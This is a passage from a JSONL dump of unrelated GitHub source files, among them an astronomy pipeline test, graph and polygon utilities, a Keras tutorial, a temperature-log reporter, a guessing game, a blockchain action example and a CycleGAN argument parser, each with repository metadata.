\"{:s}_{:d}_{:s}_{:.0f}.png\".format(\n name, ext_num, grating, central_wavelength))\n\n fig.savefig(fig_name)\n del fig, ax\n\n # -- Plot non-linear components ---\n fig, ax = plt.subplots(\n dpi=150, num=\"{:s}_{:d}_{:s}_{:.0f}_non_linear_comps\".format(\n name, ext_num, grating, central_wavelength))\n\n non_linear_model = wavecal_model.copy()\n _ = [setattr(non_linear_model, \"c{}\".format(k), 0) for k in [0, 1]]\n residuals = wavelengths - wavecal_model(peaks)\n\n p = np.linspace(min(peaks), max(peaks), 1000)\n ax.plot(wavecal_model(p), non_linear_model(p),\n \"C0-\", label=\"Generic Representation\")\n ax.plot(wavecal_model(peaks), non_linear_model(peaks) + residuals,\n \"ko\", label=\"Non linear components and residuals\")\n\n ax.legend()\n ax.grid(alpha=0.25)\n ax.set_xlabel(\"Wavelength [nm]\")\n ax.set_title(\"Non-linear components for\\n\"\n \"{:s} obtained with 
{:s} at {:.0f}\".format(\n name, grating, central_wavelength))\n\n fig_name = os.path.join(\n output_dir, \"{:s}_{:d}_{:s}_{:.0f}_non_linear_comps.png\".format(\n name, ext_num, grating, central_wavelength))\n\n fig.savefig(fig_name)\n del fig, ax\n\n # -- Plot Wavelength Solution Residuals ---\n fig, ax = plt.subplots(\n dpi=150, num=\"{:s}_{:d}_{:s}_{:.0f}_residuals\".format(\n name, ext_num, grating, central_wavelength))\n\n ax.plot(wavelengths, wavelengths - wavecal_model(peaks), \"ko\")\n\n ax.grid(alpha=0.25)\n ax.set_xlabel(\"Wavelength [nm]\")\n ax.set_ylabel(\"Residuum [nm]\")\n ax.set_title(\"Wavelength Calibrated Residuum for\\n\"\n \"{:s} obtained with {:s} at {:.0f}\".format(\n name, grating, central_wavelength))\n\n fig_name = os.path.join(\n output_dir, \"{:s}_{:d}_{:s}_{:.0f}_residuals.png\".format(\n name, ext_num, grating, central_wavelength))\n\n fig.savefig(fig_name)\n\n # -- Create artifacts ---\n if \"BUILD_ID\" in os.environ:\n branch_name = os.environ[\"BRANCH_NAME\"].replace(\"/\", \"_\")\n build_number = int(os.environ[\"BUILD_NUMBER\"])\n\n tar_name = os.path.join(output_dir, \"plots_{:s}_b{:03d}.tar.gz\".format(\n branch_name, build_number))\n\n with tarfile.open(tar_name, \"w:gz\") as tar:\n for _file in glob.glob(os.path.join(output_dir, \"*.png\")):\n tar.add(name=_file, arcname=os.path.basename(_file))\n\n target_dir = \"./plots/\"\n target_file = os.path.join(target_dir, os.path.basename(tar_name))\n\n os.makedirs(target_dir, exist_ok=True)\n os.rename(tar_name, target_file)\n\n\n# -- Recipe to create pre-processed data ---------------------------------------\ndef create_inputs_recipe():\n \"\"\"\n Creates input data for tests using pre-processed standard star and its\n calibration files.\n\n The raw files will be downloaded and saved inside the path stored in the\n `$DRAGONS_TEST/raw_inputs` directory. Processed files will be stored inside\n a new folder called \"dragons_test_inputs\". 
The sub-directory structure\n should reflect the one returned by the `path_to_inputs` fixture.\n \"\"\"\n import os\n from astrodata.testing import download_from_archive\n from geminidr.gmos.tests.spect import CREATED_INPUTS_PATH_FOR_TESTS\n\n module_name, _ = os.path.splitext(os.path.basename(__file__))\n path = os.path.join(CREATED_INPUTS_PATH_FOR_TESTS, module_name)\n os.makedirs(path, exist_ok=True)\n os.chdir(path)\n os.makedirs(\"inputs/\", exist_ok=True)\n print('Current working directory:\\n {:s}'.format(os.getcwd()))\n\n for filename, _ in input_pars:\n print('Downloading files...')\n basename = filename.split(\"_\")[0] + \".fits\"\n sci_path = download_from_archive(basename)\n sci_ad = astrodata.open(sci_path)\n data_label = sci_ad.data_label()\n\n print('Reducing pre-processed data:')\n logutils.config(file_name='log_{}.txt'.format(data_label))\n p = GMOSLongslit([sci_ad])\n p.prepare()\n p.addDQ(static_bpm=None)\n p.addVAR(read_noise=True)\n p.overscanCorrect()\n p.ADUToElectrons()\n p.addVAR(poisson_noise=True)\n p.mosaicDetectors()\n p.makeIRAFCompatible()\n\n os.chdir(\"inputs/\")\n processed_ad = p.writeOutputs().pop()\n os.chdir(\"../\")\n print('Wrote pre-processed file to:\\n'\n ' {:s}'.format(processed_ad.filename))\n\n\nif __name__ == '__main__':\n import sys\n\n if \"--create-inputs\" in sys.argv[1:]:\n create_inputs_recipe()\n else:\n pytest.main()\n","repo_name":"GeminiDRSoftware/DRAGONS","sub_path":"geminidr/gmos/tests/spect/test_determine_wavelength_solution.py","file_name":"test_determine_wavelength_solution.py","file_ext":"py","file_size_in_byte":19892,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"48"} +{"seq_id":"40462096232","text":"from collections import defaultdict\r\n\r\nclass Graph:\r\n def __init__(self):\r\n self.graph = defaultdict(list)\r\n\r\n def add_edge(self, u, v):\r\n self.graph[u].append(v)\r\n self.graph[v].append(u)\r\n\r\n def is_cyclic_util(self, v, visited, parent):\r\n visited[v] = True\r\n\r\n for neighbor in self.graph[v]:\r\n if not visited[neighbor]:\r\n if self.is_cyclic_util(neighbor, visited, v):\r\n return True\r\n elif parent != neighbor:\r\n return True\r\n\r\n return False\r\n\r\n def is_cyclic(self):\r\n visited = defaultdict(bool)\r\n\r\n for vertex in self.graph:\r\n if not visited[vertex]:\r\n if self.is_cyclic_util(vertex, visited, -1):\r\n return True\r\n\r\n return False\r\n\r\n\r\n# Example usage:\r\ng = Graph()\r\ng.add_edge(1, 2)\r\ng.add_edge(1, 3)\r\ng.add_edge(2, 5)\r\ng.add_edge(5, 7)\r\ng.add_edge(7, 6)\r\ng.add_edge(6, 3)\r\ng.add_edge(3, 4)\r\n\r\n\r\nif g.is_cyclic():\r\n print(\"Graph contains a cycle\")\r\nelse:\r\n print(\"Graph doesn't contain a cycle\")\r\n","repo_name":"369harshit/Day23-Graph","sub_path":"Detect Cycle in an Undirected Graph (using DFS).py","file_name":"Detect Cycle in an Undirected Graph (using DFS).py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39550046274","text":"from obstacles import Obstacle, Frame\nfrom utils import is_cw, is_ccw, is_collinear, tic, toc\nimport shapely\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\n\nclass Polygon(Obstacle):\n\n def __init__(self, polygon, **kwargs):\n super().__init__(**kwargs)\n self._polygon = shapely.geometry.Polygon(polygon)\n self._polygon = shapely.ops.orient(self._polygon)\n self._pol_bounds = self._polygon.bounds\n 
self._compute_global_polygon_representation()\n self.vertices = np.array(self._polygon.exterior.coords[:-1])\n self.circular_vertices = np.array(self._polygon.exterior.coords)\n\n def init_plot(self, ax=None, show_name=False, **kwargs):\n if ax is None:\n _, ax = plt.subplots(subplot_kw={'aspect': 'equal'})\n if \"fc\" not in kwargs and \"facecolor\" not in kwargs:\n kwargs[\"fc\"] = 'lightgrey'\n if 'show_reference' in kwargs:\n del kwargs['show_reference']\n line_handles = []\n # Boundary\n line_handles += [patches.Polygon(np.random.rand(3, 2), **kwargs)]\n ax.add_patch(line_handles[-1])\n # Name\n line_handles += [ax.text(0, 0, self._name)] if show_name else [None]\n return line_handles, ax\n\n def extreme_points(self, frame=Frame.GLOBAL):\n vertices = np.asarray(self.polygon(frame).exterior.coords)[:-1, :]\n return [vertices[i] for i in range(vertices.shape[0])]\n\n def update_plot(self, line_handles, frame=Frame.GLOBAL):\n polygon = self.polygon(frame)\n boundary = np.vstack((polygon.exterior.xy[0], polygon.exterior.xy[1])).T\n line_handles[0].set_xy(boundary)\n if line_handles[1] is not None:\n line_handles[1].set_position(self.pos(frame))\n\n def draw(self, frame=Frame.GLOBAL, **kwargs):\n line_handles, ax = self.init_plot(**kwargs)\n self.update_plot(line_handles, frame)\n return line_handles, ax\n\n def dilated_obstacle(self, padding, id=\"new\", name=None):\n cp = self.copy(id, name)\n cp._polygon = cp._polygon.buffer(padding, cap_style=1, join_style=1)\n cp._pol_bounds = cp._polygon.bounds\n cp.vertices = np.array(cp._polygon.exterior.coords[:-1])\n cp.circular_vertices = np.array(cp._polygon.exterior.coords)\n cp._polygon_global_pose = None\n cp._polygon_global = None\n return cp\n\n def point_location(self, x, input_frame=Frame.GLOBAL):\n x_obstacle = self.transform(x, input_frame, Frame.OBSTACLE)\n xmin, ymin, xmax, ymax = self._pol_bounds\n if not (xmin < x_obstacle[0] < xmax and ymin < x_obstacle[1] < ymax):\n return 1\n x_sh = shapely.geometry.Point(x_obstacle)\n if self._polygon.contains(x_sh):\n return -1\n if self._polygon.exterior.contains(x_sh):\n return 0\n return 1\n\n def line_intersection(self, line, input_frame=Frame.GLOBAL, output_frame=Frame.GLOBAL):\n l0_obstacle = self.transform(line[0], input_frame, Frame.OBSTACLE)\n l1_obstacle = self.transform(line[1], input_frame, Frame.OBSTACLE)\n intersection_points_shapely = shapely.geometry.LineString([l0_obstacle, l1_obstacle]).intersection(self._polygon.exterior)\n if intersection_points_shapely.is_empty:\n return []\n if intersection_points_shapely.geom_type == 'Point':\n intersection_points_obstacle = [np.array([intersection_points_shapely.x, intersection_points_shapely.y])]\n elif intersection_points_shapely.geom_type == 'MultiPoint':\n intersection_points_obstacle = [np.array([p.x, p.y]) for p in intersection_points_shapely.geoms]\n elif intersection_points_shapely.geom_type == 'LineString':\n intersection_points_obstacle = [np.array([ip[0], ip[1]]) for ip in intersection_points_shapely.coords]\n elif intersection_points_shapely.geom_type == 'MultiLineString':\n intersection_points_obstacle = [np.array([ip[0], ip[1]]) for line in intersection_points_shapely.geoms for ip in line.coords]\n else:\n print(intersection_points_shapely)\n return [self.transform(ip, Frame.OBSTACLE, output_frame) for ip in intersection_points_obstacle]\n\n def tangent_points(self, x, input_frame=Frame.GLOBAL, output_frame=Frame.GLOBAL):\n\n x_obstacle = self.transform(x, input_frame, Frame.OBSTACLE)\n t0 = tic()\n phi = 
np.arctan2(self.circular_vertices[:, 1] - x_obstacle[1], self.circular_vertices[:, 0] - x_obstacle[0])\n phi[phi < 0] += 2 * np.pi\n t1 = toc(t0)\n t0 = tic()\n phi_diff = np.diff(phi)\n t2 = toc(t0)\n t0 = tic()\n phi_decrease_idcs = phi_diff > np.pi\n phi_increase_idcs = phi_diff < -np.pi\n t3 = toc(t0)\n t0 = tic()\n phi_decrease_idcs = np.flatnonzero(phi_decrease_idcs)\n phi_increase_idcs = np.flatnonzero(phi_increase_idcs)\n for i in phi_decrease_idcs:\n phi[i+1:] -= 2*np.pi\n for i in phi_increase_idcs:\n phi[i+1:] += 2*np.pi\n t4 = toc(t0)\n\n t0 = tic()\n\n i_min, i_max = np.argmin(phi), np.argmax(phi)\n\n if abs(phi[0] - phi[-1]) > 0.00001:\n # Interior point\n return []\n if (phi[i_max] - phi[i_min]) >= 2*np.pi:\n # Blocked exterior point\n return []\n t5 = toc(t0)\n\n t0 = tic()\n tp1_obstacle = self.circular_vertices[i_max]\n tp2_obstacle = self.circular_vertices[i_min]\n\n tp1 = self.transform(tp1_obstacle, Frame.OBSTACLE, output_frame)\n tp2 = self.transform(tp2_obstacle, Frame.OBSTACLE, output_frame)\n\n tend = toc(t0)\n # print(sum([t1*100,t2*100,t3*100,t4*100,t5*100,tend*100*0]))\n return [tp1, tp2]\n\n def area(self):\n return self._polygon.area\n\n # ------------ Private methods ------------ #\n def _check_convexity(self):\n v = np.asarray(self._polygon.exterior.coords)[:-1, :]\n i = 0\n N = v.shape[0]\n # Make sure first vertice is not collinear\n while is_collinear(v[i-1, :], v[i, :], v[(i+1) % N, :]):\n i += 1\n if i > N:\n raise RuntimeError(\"Bad polygon shape. All vertices collinear\")\n # All vertices must be either cw or ccw when iterating through for convexity\n if is_cw(v[i-1, :], v[i, :], v[i+1, :]):\n self._is_convex = not any([is_ccw(v[j-1, :], v[j, :], v[(j+1) % N, :]) for j in range(v.shape[0])])\n else:\n self._is_convex = not any([is_cw(v[j-1, :], v[j, :], v[(j+1) % N, :]) for j in range(v.shape[0])])\n\n # Not needed\n def _compute_polygon_representation(self):\n pass\n","repo_name":"albindgit/starworlds","sub_path":"obstacles/polygon.py","file_name":"polygon.py","file_ext":"py","file_size_in_byte":6714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22670667577","text":"def solution(name, yearning, photo):\n answer = []\n dic = {}\n score = 0\n for i in range(len(name)):\n dic[name[i]] = yearning[i]\n \n for i in range(len(photo)):\n score = 0\n for j in range(len(photo[i])):\n if photo[i][j] in dic.keys():\n score+= dic[photo[i][j]]\n else:\n continue;\n answer.append(score)\n return answer","repo_name":"kirin2211/Programmers-Lv1","sub_path":"프로그래머스/unrated/176963. 
추억 점수/추억 점수.py","file_name":"추억 점수.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26372554032","text":"#Remove specified index from list and print\n\n\nclass Demo:\n def __init__(self):\n self.j=0\n def remove(self,a):\n i=int(input(\"enter the index to remove element from list \"))\n print(a[i],\"has been removed \")\n del a[i]\n print(\"the list after removing\",a)\n\n\nd=Demo()\n\na=[]\na1=int(input(\"how many values for a \"))\nfor i in range(0,a1):\n a2=int(input(\"enter the list values for a \"))\n a.append(a2)\nb=input(\"do u want to remove the element from list y/n\")\nif b==\"y\":\n d.remove(a)\n","repo_name":"Rakeshkumarlenka/test_functions","sub_path":"DECEMBER/LIST/Q12.Remove_specified_index.py","file_name":"Q12.Remove_specified_index.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41354242658","text":"from collections import OrderedDict\nimport os\n\nfrom binman.entry import Entry\nfrom dtoc import fdt_util\n\nclass Entry_collection(Entry):\n \"\"\"An entry which contains a collection of other entries\n\n Properties / Entry arguments:\n - content: List of phandles to entries to include\n\n This allows reusing the contents of other entries. The contents of the\n listed entries are combined to form this entry. This serves as a useful\n base class for entry types which need to process data from elsewhere in\n the image, not necessarily child entries.\n\n The entries can generally be anywhere in the same image, even if they are in\n a different section from this entry.\n \"\"\"\n def __init__(self, section, etype, node):\n super().__init__(section, etype, node)\n self.content = fdt_util.GetPhandleList(self._node, 'content')\n if not self.content:\n self.Raise(\"Collection must have a 'content' property\")\n\n def GetContents(self, required):\n \"\"\"Get the contents of this entry\n\n Args:\n required: True if the data must be present, False if it is OK to\n return None\n\n Returns:\n bytes content of the entry\n \"\"\"\n # Join up all the data\n self.Info('Getting contents, required=%s' % required)\n data = bytearray()\n for entry_phandle in self.content:\n entry_data = self.section.GetContentsByPhandle(entry_phandle, self,\n required)\n if not required and entry_data is None:\n self.Info('Contents not available yet')\n # Data not available yet\n return None\n data += entry_data\n\n self.Info('Returning contents size %x' % len(data))\n\n return data\n\n def ObtainContents(self):\n data = self.GetContents(False)\n if data is None:\n return False\n self.SetContents(data)\n return True\n\n def ProcessContents(self):\n # The blob may have changed due to WriteSymbols()\n data = self.GetContents(True)\n return self.ProcessContentsUpdate(data)\n","repo_name":"u-boot/u-boot","sub_path":"tools/binman/etype/collection.py","file_name":"collection.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":3245,"dataset":"github-code","pt":"48"} +{"seq_id":"41991369300","text":"from keras.models import Sequential\nfrom keras.layers import Dense, Activation\n\n# Create the sequential model (a linear stack of layers)\nmodel = Sequential([\n Dense(32, input_shape=(784,)),\n Activation('relu'),\n Dense(10),\n Activation('softmax'),\n])\n\n# Adding layers can also be done with add()\n# model = Sequential()\n# model.add(Dense(32, 
input_dim=784))\n# model.add(Activation('relu'))\n# model.add(Dense(10))\n# model.add(Activation('softmax'))\n\n# Specifying the input shape\nmodel = Sequential()\nmodel.add(Dense(32, input_dim=784))\n\n# Compiling - Parametrization of the model\n\n# For a multi-class classification problem\n# model.compile(optimizer='rmsprop',\n# loss='categorical_crossentropy',\n# metrics=['accuracy'])\n\n# For a binary classification problem\nmodel.compile(optimizer='rmsprop',\n loss='binary_crossentropy',\n metrics=['accuracy'])\n\n# For a mean squared error regression problem\n# model.compile(optimizer='rmsprop',\n# loss='mse')\n\n# For custom metrics\n# import keras.backend as K\n\n# def mean_pred(y_true, y_pred):\n# return K.mean(y_pred) # mean function from TensorFlow\n\n# model.compile(optimizer='rmsprop',\n# loss='binary_crossentropy',\n# metrics=['accuracy', mean_pred])\n\n\n# Training the models: \n\n# For a single-input model with 2 classes (binary classification):\n\nmodel = Sequential()\nmodel.add(Dense(32, activation='relu', input_dim=100))\nmodel.add(Dense(1, activation='sigmoid'))\nmodel.compile(optimizer='rmsprop',\n loss='binary_crossentropy',\n metrics=['accuracy'])\n\n# Generate dummy data\nimport numpy as np\ndata = np.random.random((1000, 100))\nlabels = np.random.randint(2, size=(1000, 1))\n\n# Train the model, iterating on the data in batches of 32 samples\nmodel.fit(data, labels, epochs=10, batch_size=32)\n\n\n# For a single-input model with 10 classes (categorical classification):\n\nmodel = Sequential()\nmodel.add(Dense(32, activation='relu', input_dim=100))\nmodel.add(Dense(10, activation='softmax'))\nmodel.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n# Generate dummy data\nimport numpy as np\ndata = np.random.random((1000, 100))\nlabels = np.random.randint(10, size=(1000, 1))\n\n# Convert labels to categorical one-hot encoding\nimport keras\none_hot_labels = keras.utils.to_categorical(labels, num_classes=10)\n\n# Train the model, iterating on the data in batches of 32 samples\nmodel.fit(data, one_hot_labels, epochs=10, batch_size=32)\n\n\n","repo_name":"raul-arrabales/DeepLearning","sub_path":"keras/SeqModel.py","file_name":"SeqModel.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24564884873","text":"#!/usr/bin/env python\n## Raspberry Pi Temperature Log Analyzer - 2013 Jamie Aitken.\n\n\nimport datetime\nimport socket\nimport sys\nhostname = socket.gethostname()\nnow = datetime.datetime.now()\nnowtime = now.strftime('Y-%m-%d %H:%M')\nfile = open('/tmp/logs/templog', 'r')\noutfile = open('/home/pi/log/templog', 'w')\nwebfile = open('/home/pi/log/index.html','w')\nunits = 'Celsius'\ntemplist = []\ntemp = []\nargs = []\nline = file.readline()\ninfo = ['Date: ', 'Time: ', 'Temperature: ']\n\nfor arg in sys.argv:\n args.append(arg)\n\nwhile line != '':\n \n line = line.rstrip('\\n')\n templist.append(line)\n line = file.readline()\n\t\n\t\nfile.close\t\n\ndef initializetemps():\n sublist = []\n x = 0\n while x < len(templist):\n sublist = []\n data = templist[x]\n date = data.split(\":\")[1]\n sublist.append(date)\n time = data.split(\":\")[0]\n sublist.append(time)\n temps = float(data.split(\":\")[2])\n if len(args) > 1:\n if args[1] == '-f':\n global units\n units = 'Fahrenheit'\n sublist.append((temps * 9 / 5) + 32)\n else:\n print('Error.')\n return 0\n else:\n sublist.append(temps)\n temp.append(sublist)\n x = x + 
1\n\ndef latestreading():\n global latesttemp\n global latesttime\n latesttemp = temp[len(temp) - 1][2]\n latesttime = temp[len(temp) -1][1]\n\ndef lastfive():\n global lastfi\n global lastfo\n global lastth\n global lasttw\n global laston\n lastfi = temp[len(temp) -2]\n lastfo = temp[len(temp) -3]\n lastth = temp[len(temp) -4]\n lasttw = temp[len(temp) -5]\n laston = temp[len(temp) -6]\n\ndef printdatetemp():\n y = 0\n while y < len(temp):\n z = 0\n while z < len(temp[y]):\n print(info[z], temp[y][z])\n z = z + 1\n y = y + 1\n \ndef averagetemp():\n global avg\n i = 0\n avg = 0.0\n while i < len(temp):\n avg = avg + temp[i][2]\n i = i + 1\n avg = round((avg / len(temp)),1)\n \n\ndef showmax():\n i= 0\n templist = []\n global maxnum\n global minnum\n while i < len(temp):\n templist.append(temp[i][2])\n i = i + 1\n maxnum = max(templist)\n minnum = min(templist)\n \n\ndef writeout():\n outfile.write('\\n---------------------------------------------------\\n')\n outfile.write('Temperature Log Report for ' + str(hostname) + '\\n')\n outfile.write('---------------------------------------------------\\n\\n')\n outfile.write('Report Generated: ' + str(now) +'\\n')\n outfile.write('Log Created: ' + str(temp[0][1]) + '\\n\\n')\n outfile.write('Latest Temperature (' + str(latesttime) + '): ' + str(latesttemp) + ' ' + str(units) + '\\n')\n outfile.write('Highest Recorded Temperature: ' + str(maxnum) + ' ' + str(units) + '\\n')\n outfile.write('Lowest Recorded Temperature: ' + str(minnum) + ' ' + str(units) + '\\n')\n outfile.write('Average Temperature: ' + str(avg) + ' ' + str(units) + '\\n\\n')\n## outfile.write('Previous Five Temperatures:\\n')\n## outfile.write(str(lastfi[1]) + ' ' + str(lastfi[2]) + ' Celsius\\n')\n## outfile.write(str(lastfo[1]) + ' ' + str(lastfo[2]) + ' Celsius\\n')\n## outfile.write(str(lastth[1]) + ' ' + str(lastth[2]) + ' Celsius\\n')\n## outfile.write(str(lasttw[1]) + ' ' + str(lasttw[2]) + ' Celsius\\n')\n## outfile.write(str(laston[1]) + ' ' + str(laston[2]) + ' Celsius\\n')\n outfile.close()\n\ndef genweb():\n webfile.write('\\n\\n\\n')\n webfile.write('\\n---------------------------------------------------
<br><br>\\n')\n    webfile.write('Temperature Log Report for ' + str(hostname) + '<br><br>\\n')\n    webfile.write('---------------------------------------------------<br><br>\\n')\n\n    webfile.write('Report Generated: ' + str(now) +'<br><br>\\n')\n    webfile.write('Log Created: ' + str(temp[0][1]) + '<br><br>\\n')\n\n    webfile.write('Latest Temperature (' + str(latesttime) + '): ' + str(latesttemp) + ' ' + str(units) + '<br><br>\\n')\n    webfile.write('Highest Recorded Temperature: ' + str(maxnum) + ' ' + str(units) + '<br><br>\\n')\n    webfile.write('Lowest Recorded Temperature: ' + str(minnum) + ' ' + str(units) + '<br><br>\\n')\n    webfile.write('Average Temperature: ' + str(avg) + ' ' + str(units) + '<br><br>
\\n\\n')\n webfile.write('\\n\\n')\n webfile.close()\n\n\nprint('Generating Logfile...')\ninitializetemps()\nlatestreading()\naveragetemp()\nlastfive()\nshowmax()\nwriteout()\ngenweb()\nprint('Logfile Generation Complete.')\n","repo_name":"sudoecho/templogger","sub_path":"templogoutput.py","file_name":"templogoutput.py","file_ext":"py","file_size_in_byte":4894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26781676070","text":"import random\n\nMAX_GUESSES = 5\nSTART, END = 1, 20\n\n\ndef get_random_number():\n \"\"\"Get a random number between START and END, returns int\"\"\"\n return random.randint(START, END)\n\n\nclass Game:\n \"\"\"Number guess class, make it callable to initiate game\"\"\"\n\n def __init__(self):\n \"\"\"Init _guesses, _answer, _win to set(), get_random_number(), False\"\"\"\n self._guesses = set()\n self._answer = get_random_number()\n self._win = False\n\n def guess(self):\n \"\"\"Ask user for input, convert to int, raise ValueError outputting\n the following errors when applicable:\n 'Please enter a number'\n 'Should be a number'\n 'Number not in range'\n 'Already guessed'\n If all good, return the int\"\"\"\n guess = input()\n try:\n guess_int = int(guess)\n except:\n raise ValueError(\"Please enter a number\")\n\n if guess_int in self._guesses:\n raise ValueError(\"Already guessed\")\n elif guess_int < 1 or guess_int > 20:\n raise ValueError(\"Number not in range\")\n else:\n self._guesses.add(guess_int)\n\n return guess_int\n\n def _validate_guess(self, guess):\n \"\"\"Verify if guess is correct, print the following when applicable:\n {guess} is correct!\n {guess} is too low\n {guess} is too high\n Return a boolean\"\"\"\n if guess > self._answer:\n print(f\"{guess} is too high\")\n elif guess < self._answer:\n print(f\"{guess} is too low\")\n else:\n print(f\"{guess} is correct!\")\n return True\n return False\n\n def __call__(self):\n \"\"\"Entry point / game loop, use a loop break/continue,\n see the tests for the exact win/lose messaging\"\"\"\n guess_count = 0\n while not self._win and guess_count < 5:\n try:\n guess = self.guess()\n except ValueError as e:\n print(e.args[0])\n continue\n\n if self._validate_guess(guess):\n self._win = True\n print(f\"It took you {guess_count+ 1} guesses\")\n guess_count += 1\n\n if not self._win:\n print(f\"Guessed 5 times, answer was {self._answer}\")\n ...\n\n\nif __name__ == \"__main__\":\n game = Game()\n game()\n","repo_name":"kaysagoe/pybites","sub_path":"42/guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34366690592","text":"\"\"\"Run a `runjob` action.\"\"\"\r\n\r\n\r\nimport pyntelope\r\n\r\n\r\ndata = [\r\n pyntelope.Data(\r\n name=\"worker\",\r\n value=pyntelope.types.Name(\"open.facings\"),\r\n ),\r\n pyntelope.Data(\r\n name=\"nonce\",\r\n value=pyntelope.types.Uint64(123),\r\n ),\r\n]\r\n\r\nauth = pyntelope.Authorization(actor=\"youraccount\", permission=\"active\")\r\n\r\naction = pyntelope.Action(\r\n account=\"open.facings\",\r\n name=\"runjobs\",\r\n data=data,\r\n authorization=[auth],\r\n)\r\n\r\nraw_transaction = pyntelope.Transaction(actions=[action])\r\n\r\nnet = pyntelope.WaxTestnet()\r\nlinked_transaction = raw_transaction.link(net=net)\r\n\r\nkey = \"a_very_secret_key\"\r\nsigned_transaction = linked_transaction.sign(key=key)\r\n\r\nresp = 
signed_transaction.send()\r\n","repo_name":"FACINGS/pyntelope","sub_path":"examples/run_a_simple_action.py","file_name":"run_a_simple_action.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} {"seq_id":"17827435405","text":"import os\nfrom os.path import join as opj\nimport argparse\nimport time\nfrom datetime import datetime\n\nimport cv2\nimport torch\nimport torch.distributed as dist\n\nfrom datasets.dataloader import get_dataloader, get_test_dataloader\nfrom utils.util import *\nfrom models.cyclegan import AttentionCycleGAN\n\n\ndef build_args(is_test=False):\n parser = argparse.ArgumentParser()\n\n #### dataset ####\n parser.add_argument(\"--data_root_dir\", type=str, default=\"/home/data/\")\n parser.add_argument(\"--data_name\", type=str, default=\"horse2zebra\")\n parser.add_argument(\"--in_ch\", type=int, default=3)\n parser.add_argument(\"--out_ch\", type=int, default=3)\n parser.add_argument(\"--use_crop_A\", action=\"store_true\")\n parser.add_argument(\"--use_crop_B\", action=\"store_true\")\n parser.add_argument(\"--resize_type\", type=str, default=\"scale_height\", choices=[\"resize\", \"scale_height\"])\n parser.add_argument(\"--resize_H\", type=int, default=1080, help=\"resize size used when scaling or cropping\")\n parser.add_argument(\"--resize_W\", type=int, default=1920)\n parser.add_argument(\"--img_H\", type=int, default=512)\n parser.add_argument(\"--img_W\", type=int, default=512, help=\"image size when cropping; if not cropping, images are resized to this\")\n \n #### model ####\n parser.add_argument(\"--G_attn_A_name\", type=str, default=\"basic_attn\")\n parser.add_argument(\"--G_attn_B_name\", type=str, default=\"basic_attn\")\n parser.add_argument(\"--G_AB_name\", type=str, default=\"res_9blks\")\n parser.add_argument(\"--G_BA_name\", type=str, default=\"res_9blks\")\n parser.add_argument(\"--D_AB_name\", type=str, default=\"basic\")\n parser.add_argument(\"--D_BA_name\", type=str, default=\"basic\")\n\n #### train ####\n parser.add_argument(\"--batch_size\", type=int, default=1)\n parser.add_argument(\"--n_workers\", type=int, default=4)\n parser.add_argument(\"--start_epoch\", type=int, default=1)\n parser.add_argument(\"--n_epochs\", type=int, default=10000)\n parser.add_argument(\"--linearlr_epochs\", type=int, default=50, help=\"linear decay ratio for linear lr scheduler\")\n parser.add_argument(\"--target_real_label\", type=float, default=1.0)\n parser.add_argument(\"--target_gene_label\", type=float, default=0.0)\n parser.add_argument(\"--G_lr\", type=float, default=2e-4)\n parser.add_argument(\"--D_lr\", type=float, default=2e-4)\n parser.add_argument(\"--G_betas\", type=tuple, default=(0.5, 0.999))\n parser.add_argument(\"--D_betas\", type=tuple, default=(0.5, 0.999))\n parser.add_argument(\"--gan_loss_name\", type=str, default=\"lsgan\", choices=[\"lsgan\", \"wgangp\", \"vanilla\"])\n parser.add_argument(\"--lr_scheduler\", type=str, default=\"linear\", choices=[\"linear\", \"step\", \"plateau\", \"cosine\"])\n parser.add_argument(\"--lambda_ID\", type=float, default=0.5)\n parser.add_argument(\"--lambda_A\", type=float, default=10.0)\n parser.add_argument(\"--lambda_B\", type=float, default=10.0)\n parser.add_argument(\"--pool_size\", type=int, default=50)\n parser.add_argument(\"--no_vgg\", action=\"store_true\")\n parser.add_argument(\"--attn_thres\", type=float, default=0.1)\n parser.add_argument(\"--use_mask_for_D\", action=\"store_true\", help=\"If True, use equation 7 from the paper: 
the mask is applied to the input of D, but the threshold is not applied.\") \n parser.add_argument(\"--stop_attn_learning_epoch\", type=int, default=30, help=\"after this epoch the attention modules are no longer trained\")\n\n #### save ####\n parser.add_argument(\"--no_save\", action=\"store_true\")\n parser.add_argument(\"--save_root_dir\", type=str, default=\"/media/data1/jeonghokim/VFP290K_GAN/save/cyclegan_attention\")\n parser.add_argument(\"--save_name\", type=str, default=f\"{datetime.now().strftime('%Y%m%d')}\")\n parser.add_argument(\"--log_save_iter_freq\", type=int, default=100)\n parser.add_argument(\"--img_save_iter_freq\", type=int, default=100)\n parser.add_argument(\"--model_save_iter_freq\", type=int, default=500)\n parser.add_argument(\"--n_save_images\", type=int, default=8)\n\n #### config ####\n parser.add_argument(\"--use_DDP\", action=\"store_true\")\n args = parser.parse_args()\n args.is_test = is_test\n if is_test:\n args.use_DDP = False\n args.no_save = True\n if args.use_DDP: args.local_rank = int(os.environ[\"LOCAL_RANK\"])\n else: args.local_rank = 0\n args.save_dir = opj(args.save_root_dir, args.save_name)\n args.img_save_dir = opj(args.save_dir, \"save_images\")\n args.model_save_dir = opj(args.save_dir, \"save_models\")\n args.log_path = opj(args.save_dir, \"log.txt\")\n args.config_path = opj(args.save_dir, \"config.json\")\n if not args.no_save:\n 